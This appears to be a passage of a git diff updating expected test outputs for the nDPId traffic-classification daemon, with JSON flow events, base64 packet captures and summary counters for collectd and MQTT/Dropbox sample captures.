+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":8516,"packets-processed":8514,"total-skipped-flows":0,"total-l4-payload-len":294179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":16,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":91,"global_ts_msec":1455907286855} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 8516/8514 @@ -97,9 +97,9 @@ ~~ total active/idle flows...: 16/16 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6140441 bytes -~~ total memory freed........: 6140441 bytes -~~ total allocations/frees...: 126692/126692 +~~ total memory allocated....: 6274075 bytes +~~ total memory freed........: 6274075 bytes +~~ total allocations/frees...: 129454/129454 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 824 chars diff --git a/test/results/collectd.pcap.out b/test/results/collectd.pcap.out index b6bb84786..dd9faaa21 100644 --- a/test/results/collectd.pcap.out +++ b/test/results/collectd.pcap.out @@ -2,25 +2,25 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946742154132} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742154132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02208{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946742154132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1368,"pkt_l4_len":1334,"thread_ts_msec":946742154132,"pkt":"AAAAAAAAAAAAAAAACABFAAVKil5AAEARrUJ\/AAABfwAAAY7gZOIFNgNKAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqh0gIgY30AAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMQAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiByMEAAwAGMwAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiBcUEAAwAGMgAABQAMc29mdGlycQAABgAPAAECAAAAAAAAUz8ACAAMGKqHSAiB0JMAAwAGMAAABQAJaWRsZQAABgAPAAECAAAAAABG4skACAAMGKqHSAiB3pAAAwAGMgAABgAPAAECAAAAAABKYAwACAAMGKqHSAiB1uQAAwAGMQAABgAPAAECAAAAAABIjKAACAAMGKqHSAiB5qEAAwAGMwAABgAPAAECAAAAAABJKEEACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAJdXNlZAAABgAPAAEBAAAAAGaR7UEABQANYnVmZmVyZWQAAAYADwABAQAAAABgfcBBAAgADBiqh0gIgR9KAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAQ\/5AAgADBiqh0gIg2eWAAIAC21lbW9yeQAAAwAFAAAEAAttZW1vcnkAAAUAC2NhY2hlZAAABgAPAAEBAAAAABRC50EACAAMGKqHSAiBMQAAAgAIY3B1AAADAAYyAAAEAAhjcHUAAAUADmludGVycnVwdAAABgAPAAECAAAAAAAA0OkACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAQc2xhYl91bnJlY2wAAAYADwABAQAAAADA25dBAAgADBiqh0gIgb+WAAIACGNwdQAAAwAGMgAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAOYXZhaWxhYmxlAAAGAA8AAQEAAAAA6E7rQQAFAAlmcmVlAAAGAA8AAQEAAAAAwJ+1QQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAgTKlBAAgADBiqh0qIftQ9AAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABaxWwAIAAwYqodKiH8nRwADAAYxAAAGAA8AAQIAAAAAABX6SQAIAAwYqodKiH9osQADAAYyAAAGAA8AAQIAAAAAABQajAAIAAwYqodKiH+V7gADAAYzAAAGAA8AAQIAAAAAABX6jAAIAAwYqodKiH\/NZwADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKtmAAgADBiqh0qIgA6xAAMABjEAAAYADwABAgAAAAAABKpXAAgADBiqh0qIgBbKAAMABjIAAAYADwABAgAAAAAABKBGAAgADBiqh0qIgB0cAAMABjMAAAYADwABAgAAAAAABI2rAAgADBiqh0qIgCfPAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPsAAgADBiqh0qIgC9\/AAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0qIgDfpAAMABjIAAAYADwABAgAAAAAAAEdVAAgADBiqh0qIgD96AAMABjMAAAYADwABAgAAAAAAAD6AAAgADBiqh0qIgEcAAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAm"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742154132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742154132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"collectd.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742155132,"flow_last_seen":946742155132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742155132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36320,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02210{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"collectd.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946742155132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1368,"pkt_l4_len":1334,"thread_ts_msec":946742155132,"pkt":"AAAAAAAAAAAAAAAACABFAAVKil5AAEARrUJ\/AAABfwAAAY3gZOIFNgNKAAD\/\/2RldmxhcC5mcml0ei5ib3gAAAgADBiqh0gIgY30AAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMQAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiByMEAAwAGMwAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiBcUEAAwAGMgAABQAMc29mdGlycQAABgAPAAECAAAAAAAAUz8ACAAMGKqHSAiB0JMAAwAGMAAABQAJaWRsZQAABgAPAAECAAAAAABG4skACAAMGKqHSAiB3pAAAwAGMgAABgAPAAECAAAAAABKYAwACAAMGKqHSAiB1uQAAwAGMQAABgAPAAECAAAAAABIjKAACAAMGKqHSAiB5qEAAwAGMwAABgAPAAECAAAAAABJKEEACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAJdXNlZAAABgAPAAEBAAAAAGaR7UEABQANYnVmZmVyZWQAAAYADwABAQAAAABgfcBBAAgADBiqh0gIgR9KAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAQ\/5AAgADBiqh0gIg2eWAAIAC21lbW9yeQAAAwAFAAAEAAttZW1vcnkAAAUAC2NhY2hlZAAABgAPAAEBAAAAABRC50EACAAMGKqHSAiBMQAAAgAIY3B1AAADAAYyAAAEAAhjcHUAAAUADmludGVycnVwdAAABgAPAAECAAAAAAAA0OkACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAQc2xhYl91bnJlY2wAAAYADwABAQAAAADA25dBAAgADBiqh0gIgb+WAAIACGNwdQAAAwAGMgAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAOYXZhaWxhYmxlAAAGAA8AAQEAAAAA6E7rQQAFAAlmcmVlAAAGAA8AAQEAAAAAwJ+1QQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAgTKlBAAgADBiqh0qIftQ9AAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABaxWwAIAAwYqodKiH8nRwADAAYxAAAGAA8AAQIAAAAAABX6SQAIAAwYqodKiH9osQADAAYyAAAGAA8AAQIAAAAAABQajAAIAAwYqodKiH+V7gADAAYzAAAGAA8AAQIAAAAAABX6jAAIAAwYqodKiH\/NZwADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKtmAAgADBiqh0qIgA6xAAMABjEAAAYADwABAgAAAAAABKpXAAgADBiqh0qIgBbKAAMABjIAAAYADwABAgAAAAAABKBGAAgADBiqh0qIgB0cAAMABjMAAAYADwABAgAAAAAABI2rAAgADBiqh0qIgCfPAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPsAAgADBiqh0qIgC9\/AAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0qIgDfpAAMABjIAAAYADwABAgAAAAAAAEdVAAgADBiqh0qIgD96AAMABjMAAAYADwABAgAAAAAAAD6AAAgADBiqh0qIgEcAAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAm"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742156132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02210{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946742156132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1368,"pkt_l4_len":1334,"thread_ts_msec":946742156132,"pkt":"AAAAAAAAAAAAAAAACABFAAVKil5AAEARrUJ\/AAABfwAAAYzgZOIFNgNKAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqh0gIgY30AAkADAAAAAKAAAAA\/\/8ACGNwdQAAAwAGMQAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiByMEAAwAGMwAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiBcUEAAwAGMgAABQAMc29mdGlycQAABgAPAAECAAAAAAAAUz8ACAAMGKqHSAiB0JMAAwAGMAAABQAJaWRsZQAABgAPAAECAAAAAABG4skACAAMGKqHSAiB3pAAAwAGMgAABgAPAAECAAAAAABKYAwACAAMGKqHSAiB1uQAAwAGMQAABgAPAAECAAAAAABIjKAACAAMGKqHSAiB5qEAAwAGMwAABgAPAAECAAAAAABJKEEACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAJdXNlZAAABgAPAAEBAAAAAGaR7UEABQANYnVmZmVyZWQAAAYADwABAQAAAABgfcBBAAgADBiqh0gIgR9KAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAQ\/5AAgADBiqh0gIg2eWAAIAC21lbW9yeQAAAwAFAAAEAAttZW1vcnkAAAUAC2NhY2hlZAAABgAPAAEBAAAAABRC50EACAAMGKqHSAiBMQAAAgAIY3B1AAADAAYyAAAEAAhjcHUAAAUADmludGVycnVwdAAABgAPAAECAAAAAAAA0OkACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAQc2xhYl91bnJlY2wAAAYADwABAQAAAADA25dBAAgADBiqh0gIgb+WAAIACGNwdQAAAwAGMgAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAOYXZhaWxhYmxlAAAGAA8AAQEAAAAA6E7rQQAFAAlmcmVlAAAGAA8AAQEAAAAAwJ+1QQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAgTKlBAAgADBiqh0qIftQ9AAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABaxWwAIAAwYqodKiH8nRwADAAYxAAAGAA8AAQIAAAAAABX6SQAIAAwYqodKiH9osQADAAYyAAAGAA8AAQIAAAAAABQajAAIAAwYqodKiH+V7gADAAYzAAAGAA8AAQIAAAAAABX6jAAIAAwYqodKiH\/NZwADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKtmAAgADBiqh0qIgA6xAAMABjEAAAYADwABAgAAAAAABKpXAAgADBiqh0qIgBbKAAMABjIAAAYADwABAgAAAAAABKBGAAgADBiqh0qIgB0cAAMABjMAAAYADwABAgAAAAAABI2rAAgADBiqh0qIgCfPAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPsAAgADBiqh0qIgC9\/AAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0qIgDfpAAMABjIAAAYADwABAgAAAAAAAEdVAAgADBiqh0qIgD96AAMABjMAAAYADwABAgAAAAAAAD6AAAgADBiqh0qIgEcAAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAm"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742156132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742156132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":4,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":3,"total-skipped-flows":0,"total-l4-payload-len":3978,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":946746151465} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"collectd.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"collectd.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946746151465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946746151465,"pkt":"AAAAAAAAAAAAAAAACABFAAVysRJAAAERFprAqLIj78BKQpqYZOIFXrI+AhAFVv\/\/dXNlcsEiWwf\/ecmHq20KMKY60TNgWTifxhUWZCzzOonut\/nBLF1H9\/qjrU5R7\/H5O\/9DCfuI7YKK9r+lg3rOUKcDtnx6k3gtNCOgHQsqM7rGW+eN33S1hv\/QWiqJh22vfUfr7Wz7pYGKApBiZvpQtTEhc5hAetf3FPDtHKTWmaIAv9tpMJ\/C1iMPcZFdIsr2dDPokYbKhkO7YK1VgRFBm2eTLctpolFTqtNDbNm7ZZj+J4aMD2mZJnGIwYcXGtrkRXSRyBums+W0\/jz8zVPv3F9mqHBPDINnDWvpLDLobIdObIJno8I9jJWIUvexsFajL\/Ozn6gm5h5Bbary3bFaI1eTK9\/2PtGLDA75C4TnHGlqTybsnLPrgfJgwREyLUHKyyjysSqq3nmcDjg2jxv7jB\/7C1x4ERVxqcLGWKVSyPtJGgd833gDOhBdG4xbUSAQLAZ93ZhNhqDYpSH1iLu4WeSFrvXELH+6cym0Y6TgPbHb995Xd4eeznstGpKVPXUMBMYKyolrAJf5IhADYmfwsVbHYwmMY4b+7dLe8Xm4J6pnNHkCQ8D8q\/xlIjpnUrS9OVed\/2DlDBS1QStbE\/5D9qtP1vKoQWi7aNQljNk4LIQq71gjvpOQoYs5A2fU7jqs5Cj7g1YVzvRN1szG+q0InctAJFWNqveI4E4VlH\/arcTeRtG6STEypPhnpvREi8Y1HMoKqCoQ2XNXh6LreKH8j13m7n5IUINrWLGczoOvwh46DPuvBo2KGeZrJslABigBIDcj82i9s8gLnjLw9\/JZ2x7gkouGNhGSwI6E+HHJlTbRNuUsv\/6rZpEcDEihG4n3z7Vt80LO+ANJQ1PEO96u3kHeqsvkky84XapbdS3hpG\/ZxbNSNY8nK4OCSOQQ8HmKfoJVs6uDOBd\/wp2958CwlilWA+S7vIiQ1XgDMWkpnLBj0SxBkzaVjTocJQTqqyWTwe3IhhIJv81ISkko8HlqeLw6ucXInaAjACXZe+tWeEVUOeFlwkGIIzC1N4S0VtZ61SexhHWzr\/i9+G9ZKKsehcu3XJBgh1f60wB6VdfrKhuC5O+DjSawaWC4SpBpu+HXc5ivM+uiz5tYgYFHvZZNAX520+pU7SYW1nlm8z8\/p7hrSy4or4XEkX6alUhb2dPGHzFD8JaAiNPkifbtDixhZdVcES3WwpR0Ee8a2+96wN6EZWNgwUs7rB2p7yVJHR76cDlQ4Kn2ZsRDtijNF38f24MQDLxP4V3sCe2kxcWUIAwjR6dboGGToHbd4gC7kvh\/FM9CeCXw8edRrjHiX4wnTLxVl9Tka0gXAevnElxIQ6DbX8f3r7039o6XRuqpxn0ACZ1UjAWdNP5AnrGPEDhQYcbCL1rrIoiDXNbcbYfPGBMR0rENIqKDB4er0OJ0AMEmws1dKMgg8kdYXjcu2lTLVY4\/4d9fGNXECu0E+IBVi1I\/a05N27robtMnHhQS3RLkMgdw2UHSJmRpgA2AeN7d5fzdRb1cndtHczkpZ4DqnETqYT245MmiMyzhppvI8TfDhCd1ynjvTf\/tCkooHN2LdiiRy3Nwel6jnMS4sDovy8cCEn9qicofWJUG7y5a\/VIh54v0RwEEnumWw\/ZdPXVhbMfahFcQa0uAqmRQ+1dUag87w7YOq0bDC6ojsLdQ0XEWCC562cwnsSkgbZ5fTl3ZKIGjfA5C2IbcoLoeLIRL87MyrjfoqdSbenCEN1JHvCKm8MwRfUxtBnRG6JvCJKg82EHDqygdxWBY5xyz+WlvhZcsZvu\/jKGESQRQiW2wuv9DlwnzHiLS\/qJ\/XT4Fpxe9+g=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"collectd.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39577,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"collectd.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946746151465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946746151465,"pkt":"AAAAAAAAAAAAAAAACABFAAVysRJAAAERFprAqLIj78BKQpqZZOIFXrI+AhD\/\/wAEdXNlcsEiWwf\/ecmHq20KMKY60TNgWTifxhUWZCzzOonut\/nBLF1H9\/qjrU5R7\/H5O\/9DCfuI7YKK9r+lg3rOUKcDtnx6k3gtNCOgHQsqM7rGW+eN33S1hv\/QWiqJh22vfUfr7Wz7pYGKApBiZvpQtTEhc5hAetf3FPDtHKTWmaIAv9tpMJ\/C1iMPcZFdIsr2dDPokYbKhkO7YK1VgRFBm2eTLctpolFTqtNDbNm7ZZj+J4aMD2mZJnGIwYcXGtrkRXSRyBums+W0\/jz8zVPv3F9mqHBPDINnDWvpLDLobIdObIJno8I9jJWIUvexsFajL\/Ozn6gm5h5Bbary3bFaI1eTK9\/2PtGLDA75C4TnHGlqTybsnLPrgfJgwREyLUHKyyjysSqq3nmcDjg